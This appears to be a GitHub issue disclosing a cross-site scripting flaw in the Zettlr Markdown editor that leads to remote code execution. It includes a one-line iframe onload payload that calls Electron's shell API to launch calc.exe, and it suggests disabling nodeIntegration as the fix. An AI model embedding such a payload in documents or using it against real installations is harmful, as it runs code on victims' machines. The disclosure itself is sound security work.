Cross-site scripting leads to Remote Code Execution #1716
Labels
bug
A bug that affects the functionality of Zettlr.
confirmed
At least two users and/or the developers confirmed this issue.
pinned
Indicates this issue should not be automatically handled by the bots.
priority:high
This issue has high priority and should be implemented asap.
security
Pull requests that address a security vulnerability
Projects
Description
XSS leads to remote code execution
Reproducing
Or make the md file by yourself. Foo.md content:
<iframe src=x onload="require('electron').shell.openExternal('C:/Windows/System32/calc.exe')"></iframe>Expected behaviour
XSS payload shouldn't execute
Set nodeIntregration as false
Platform
Additional information
The text was updated successfully, but these errors were encountered: